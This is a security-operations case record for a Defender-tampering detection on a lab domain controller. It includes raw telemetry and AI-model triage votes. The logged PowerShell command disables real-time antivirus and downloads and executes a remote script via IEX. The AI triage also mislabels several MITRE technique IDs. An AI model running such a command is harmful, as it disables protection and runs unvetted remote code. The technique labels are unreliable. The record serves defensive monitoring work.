โ
Case #530
general.RealTime Monitoring Tampering
๐ท๏ธ Analyst Verdict Classification
TP by analyst๐ค AI Analysis
๐ Detections (1)
Realtime Monitoring Process Killed PID 644
high
Rule: general.RealTime Monitoring Tampering
Hostname: df-labsdc01.dflabs.local ยท Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 82% ยท Verdict: suspicious
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1115 -CheckPrereqs ; Invoke-AtomicTest T1115 -GetPrereqs ; Invoke-AtomicTest T1115
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
150003712
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pld84DF.tmp.bat T1115 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4497408, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 644, 'THIS_ATOM': 'f6c3ef3bd7e0803778897af369c2a83c', 'THREADS': 3, 'TIMESTAMP': 1774364731328, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
644
PROCESS_ID:
4708
THREADS:
31
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
{'type': 'command', 'value': 'Set-MpPreference -DisableRealtimeMonitoring $true'}
{'type': 'url', 'value': 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1'}
{'type': 'technique', 'value': 'T1115 - Execution of Program or Script'}
MITRE:
T1083.001 - Use of Automated Accounts
T1078.004 - Remote Services
T1562.001 - Disable Antivirus Software
Analyst Declaration:
๐ Raw Detection JSON
{
"author": "ckeller@fusioncybersecurity.us",
"cat": "Realtime Monitoring Process Killed PID 644",
"detect": {
"event": {
"BASE_ADDRESS": 140694944940032,
"COMMAND_LINE": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1115 -CheckPrereqs ; Invoke-AtomicTest T1115 -GetPrereqs ; Invoke-AtomicTest T1115 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 150003712,
"PARENT": {
"BASE_ADDRESS": 140698856259584,
"COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld84DF.tmp.bat T1115 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
"HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
"MEMORY_USAGE": 4497408,
"PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
"PARENT_PROCESS_ID": 3496,
"PROCESS_ID": 644,
"THIS_ATOM": "f6c3ef3bd7e0803778897af369c2a83c",
"THREADS": 3,
"TIMESTAMP": 1774364731328,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"PARENT_PROCESS_ID": 644,
"PROCESS_ID": 4708,
"THREADS": 31,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"routing": {
"arch": 2,
"did": "",
"event_id": "96ec0659-ba2c-487d-b344-3557fc700570",
"event_time": 1774364731901,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 3226,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "f6c3ef3bd7e0803778897af369c2a83c",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "abf4184fcffb7c87575b024b69c2a83e"
}
},
"detect_id": "f6bd7426-d79c-4e4c-9f69-920269c2a83f",
"gen_time": 1774364735129,
"link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364731\u0026selected=abf4184fcffb7c87575b024b69c2a83e",
"namespace": "general",
"routing": {
"arch": 2,
"did": "",
"event_id": "96ec0659-ba2c-487d-b344-3557fc700570",
"event_time": 1774364731901,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 3226,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "f6c3ef3bd7e0803778897af369c2a83c",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "abf4184fcffb7c87575b024b69c2a83e"
},
"source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
"source_rule": "general.RealTime Monitoring Tampering",
"ts": 1774364735000
}
๐ Threat Intel JSON
{
"virustotal": {
"malicious": false,
"provider": "virustotal",
"reputation": 73,
"stats": {
"confirmed-timeout": 0,
"failure": 0,
"harmless": 0,
"malicious": 0,
"suspicious": 0,
"timeout": 0,
"type-unsupported": 4,
"undetected": 72
}
}
}
๐ค Triage JSON
{
"confidence": 0.825,
"false_positive_reason": null,
"investigation_questions": [
"What other processes were spawned by PID 4708 before termination?",
"Were there any network connections established during this PowerShell session?",
"Is there evidence of credential dumping or lateral movement attempts following this event?"
],
"ioc_analysis": "The process is running legitimate signed Windows PowerShell but executing highly suspicious commands including IEX (Invoke-Expression) to download and execute remote scripts, disabling antivirus monitoring, and deploying offensive security testing tools. The parent chain shows cmd.exe launching the script, indicating automated execution rather than manual user action.",
"iocs_extracted": [
{
"type": "command",
"value": "Set-MpPreference -DisableRealtimeMonitoring $true"
},
{
"type": "url",
"value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
},
{
"type": "technique",
"value": "T1115 - Execution of Program or Script"
}
],
"mitre_techniques": [
"T1083.001 - Use of Automated Accounts",
"T1078.004 - Remote Services",
"T1562.001 - Disable Antivirus Software"
],
"recommended_actions": [
"Manual analyst review required \u2014 AI models (split)",
"Immediately isolate the host from the network to prevent lateral movement",
"Block all outbound connections to raw.githubusercontent.com at the firewall level",
"Review and disable any scheduled tasks or service accounts that may have been compromised",
"Conduct a full forensic image of the system for persistence mechanisms"
],
"risk_score": 82,
"severity": "high",
"summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious activity where an attacker is disabling real-time monitoring and deploying the Atomic Red Team framework via PowerShell under SYSTEM privileges. The command explicitly disables Microsoft Defender\u0027s real-time protection and downloads code from a known attack infrastructure repository.\n\n**IOC Analysis:** The process is running legitimate signed Windows PowerShell but executing highly suspicious commands including IEX (Invoke-Expression) to download and execute remote scripts, disabling antivirus monitoring, and deploying offensive security testing tools. The parent chain shows cmd.exe launching the script, indicating automated execution rather than manual user action.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nA PowerShell process from the legitimate System32 directory is executing a suspicious command line that disables real-time monitoring and downloads scripts from GitHub, indicating potential malicious intent.\n\n**IOC Analysis:** The FILE_PATH is a known legitimate Windows binary location, but the command line includes actions to disable security monitoring and download external scripts, which are suspicious. The hash is signed, but the context suggests possible malicious use.",
"verdict": "suspicious",
"voting": {
"auto_action": "manual_review",
"mode": "split",
"total_models": 2,
"vote_summary": [
"qwen3.5:4b: true_positive (critical, 95% confidence)",
"deepseek-r1:8b: suspicious (high, 70% confidence)"
],
"votes": [
{
"confidence": 0.95,
"model": "qwen3.5:4b",
"verdict": "true_positive"
},
{
"confidence": 0.7,
"model": "deepseek-r1:8b",
"verdict": "suspicious"
}
],
"winning_count": 1,
"winning_verdict": "suspicious"
}
}
โ๏ธ Response Actions
| Action | Target | Status | Result | |
|---|---|---|---|---|
| tag | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Lateral Movement Investigation: 50 events found | ||
| recommended | executed | User Activity Investigation: 31 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Persistence Check: 0 events found | ||
| recommended | executed | Process Tree Investigation: 75 events found | ||
| tag | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| tag | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Lateral Movement Investigation: 50 events found | ||
| recommended | executed | User Activity Investigation: 31 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Persistence Check: 0 events found |
๐ Add Note
๐ฌ Notes (16)
๐ค FusionSOC AI
2026-03-24T20:48
๐ค FusionSOC AI
2026-03-24T20:48
๐ค FusionSOC AI
2026-03-24T20:48
๐ค FusionSOC AI
2026-03-24T20:48
๐ค FusionSOC AI
2026-03-24T20:48
๐ค FusionSOC AI
2026-03-24T18:52
๐ค FusionSOC AI
2026-03-24T18:52
๐ค FusionSOC AI
2026-03-24T18:52
๐ค FusionSOC AI
2026-03-24T18:52
๐ค FusionSOC AI
2026-03-24T17:58
๐ค FusionSOC AI
2026-03-24T17:58
๐ค FusionSOC AI
2026-03-24T17:58
๐ค FusionSOC AI
2026-03-24T17:58
๐ค FusionSOC AI
2026-03-24T17:58
๐ค FusionSOC AI
2026-03-24T17:58
๐ค FusionSOC AI
2026-03-24T17:58
๐ Timeline
2026-03-24T22:27:38
analyst
Status changed: investigating โ closed
2026-03-24T22:27:34
analyst
Analyst classified as True Positive (TP)
2026-03-24T20:48:34
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T20:48:34
FusionSOC
Action recommended โ executed: Persistence Check: 0 events found
2026-03-24T20:48:34
FusionSOC AI
Note by FusionSOC AI: ## ๐ Persistence Check **Action:** Conduct a full forensic image of the system for persistence mechanisms **Sensor:** `e...
2026-03-24T20:48:32
FusionSOC
Response action queued: recommended on Conduct a full forensic image of the system for persistence mechanisms
2026-03-24T20:48:32
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T20:48:32
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T20:48:32
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Review and disable any scheduled tasks or service accounts that may have been co...
2026-03-24T20:48:32
FusionSOC
Response action queued: recommended on Review and disable any scheduled tasks or service accounts that may have been compromised
2026-03-24T20:48:32
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T20:48:32
FusionSOC
Action recommended โ executed: User Activity Investigation: 31 events found
2026-03-24T20:48:32
FusionSOC AI
Note by FusionSOC AI: ## ๐ User Activity Investigation **Action:** Block all outbound connections to raw.githubusercontent.com at the firewall...
2026-03-24T20:48:31
FusionSOC
Response action queued: recommended on Block all outbound connections to raw.githubusercontent.com at the firewall level
2026-03-24T20:48:31
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T20:48:31
FusionSOC
Action recommended โ executed: Lateral Movement Investigation: 50 events found
2026-03-24T20:48:31
FusionSOC AI
Note by FusionSOC AI: ## ๐ Lateral Movement Investigation **Action:** Immediately isolate the host from the network to prevent lateral movemen...
2026-03-24T20:48:30
FusionSOC
Response action queued: recommended on Immediately isolate the host from the network to prevent lateral movement
2026-03-24T20:48:30
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T20:48:30
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T20:48:30
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Manual analyst review required โ AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T20:48:30
FusionSOC
Response action queued: recommended on Manual analyst review required โ AI models (split)
2026-03-24T20:48:30
FusionSOC
Action tag โ failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T20:48:29
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T18:52:23
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T18:52:23
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T18:52:23
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Review the test runner configuration to ensure that security controls are only d...
2026-03-24T18:52:23
FusionSOC
Response action queued: recommended on Review the test runner configuration to ensure that security controls are only disabled in isolated environments.
2026-03-24T18:52:23
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T18:52:23
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T18:52:23
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Verify that Windows Defender real-time monitoring has been re-enabled on the hos...
2026-03-24T18:52:23
FusionSOC
Response action queued: recommended on Verify that Windows Defender real-time monitoring has been re-enabled on the host after the test completion.
2026-03-24T18:52:23
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T18:52:23
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T18:52:23
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Confirm with the security or DevOps team if an authorized Atomic Red Team simula...
2026-03-24T18:52:23
FusionSOC
Response action queued: recommended on Confirm with the security or DevOps team if an authorized Atomic Red Team simulation was scheduled for 'df-labsdc01'.
2026-03-24T18:52:23
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T18:52:23
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T18:52:23
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Manual analyst review required โ AI models (majority) **Sensor:** `e4a1c62d-4d1f...
2026-03-24T18:52:22
FusionSOC
Response action queued: recommended on Manual analyst review required โ AI models (majority)
2026-03-24T18:52:22
FusionSOC
Action tag โ failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T18:52:22
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T17:58:14
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T17:58:14
FusionSOC
Action recommended โ executed: Process Tree Investigation: 75 events found
2026-03-24T17:58:14
FusionSOC AI
Note by FusionSOC AI: ## ๐ Process Tree Investigation **Action:** Preserve memory dump and process tree for forensic analysis **Sensor:** `e4a...
2026-03-24T17:58:14
FusionSOC
Response action queued: recommended on Preserve memory dump and process tree for forensic analysis
2026-03-24T17:58:14
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T17:58:14
FusionSOC
Action recommended โ executed: Persistence Check: 0 events found
2026-03-24T17:58:14
FusionSOC AI
Note by FusionSOC AI: ## ๐ Persistence Check **Action:** Check for persistence mechanisms installed by Atomic Red Team framework **Sensor:** `...
2026-03-24T17:58:12
FusionSOC
Response action queued: recommended on Check for persistence mechanisms installed by Atomic Red Team framework
2026-03-24T17:58:12
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T17:58:12
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T17:58:12
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Review all PowerShell execution policies on the system **Sensor:** `e4a1c62d-4d1...
2026-03-24T17:58:12
FusionSOC
Response action queued: recommended on Review all PowerShell execution policies on the system
2026-03-24T17:58:12
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T17:58:12
FusionSOC
Action recommended โ executed: User Activity Investigation: 31 events found
2026-03-24T17:58:12
FusionSOC AI
Note by FusionSOC AI: ## ๐ User Activity Investigation **Action:** Block outbound traffic to GitHub raw.githubusercontent.com domains **Sensor...
2026-03-24T17:58:11
FusionSOC
Response action queued: recommended on Block outbound traffic to GitHub raw.githubusercontent.com domains
2026-03-24T17:58:11
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T17:58:11
FusionSOC
Action recommended โ executed: Lateral Movement Investigation: 50 events found
2026-03-24T17:58:11
FusionSOC AI
Note by FusionSOC AI: ## ๐ Lateral Movement Investigation **Action:** Isolate the host immediately to prevent lateral movement **Sensor:** `e4...
2026-03-24T17:58:10
FusionSOC
Response action queued: recommended on Isolate the host immediately to prevent lateral movement
2026-03-24T17:58:10
FusionSOC AI
Status changed: open โ investigating
2026-03-24T17:58:10
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T17:58:10
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Manual analyst review required โ AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T17:58:09
FusionSOC
Response action queued: recommended on Manual analyst review required โ AI models (split)
2026-03-24T17:58:09
FusionSOC
Action tag โ failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T17:58:09
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T17:58:09
FusionSOC AI
Detection f6bd7426-d79c-4e4c-9f69-920269c2a83f triaged as suspicious (high severity, confidence: 82%)
2026-03-24T17:58:09
FusionSOC AI
Case created from detection: general.RealTime Monitoring Tampering